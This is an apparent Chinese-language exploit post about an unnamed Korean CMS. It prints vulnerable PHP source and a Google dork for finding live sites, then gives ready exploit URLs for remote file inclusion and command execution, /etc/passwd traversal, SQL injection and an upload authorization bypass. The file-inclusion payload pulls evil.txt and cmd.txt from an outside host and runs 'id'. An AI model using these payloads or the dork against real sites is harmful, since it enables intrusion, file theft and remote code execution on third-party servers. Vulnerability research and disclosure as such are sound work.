韩国某cms远程包含、注射、文件泄漏、上传等多个漏洞
来源:0x50sec.org
无意中发现的,名字未知,版本不详,问题一堆
Google Dork: inurl:bbs_sun/board.php
board.php文件内容如下:
————————–
<?
if(!$admin) $pgUp .= “../”;
else if($admin==’N') $pgUp .= “”;
include $pgUp.”inc/dbconn.php”;
include $pgUp.”bbs_sun/config.php”;
?>
<link href=”<?=$skinSrc?>/style.css” rel=”stylesheet” type=”text/css”>
<?
if($mode == “list”) include ($skinSrc.”/list.php”);
else if($mode == “write” || $mode == “modify” || $mode == “reply”) include ($skinSrc.”/write.php”);
else if($mode == “view”) include ($skinSrc.”/view.php”);
else if($mode == “delete” || $mode == “ment_delete”) include ($skinSrc.”/delete.php”);
?>
————————–
此处存在远程文件包含漏洞
EXP:
http://xxxx.kr/bbs_sun/board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?
board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?&skinSrc=http://www.0x50sec.org/cmd.txt?&cmd=id&mode=view
有的含有download.php文件,对file变量和bname变量都没有进行必要的检查,导致文件泄漏漏洞:
EXP:
http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&bname=../
mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞
mode=view&number=
mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过,从而可以发布文章和上传文件。
打开一条记录,将mode=view直接改为write就可以上传了。
可能还存在其他的问题比如文件删除等,懒得看了。
为什么传不上去文件呢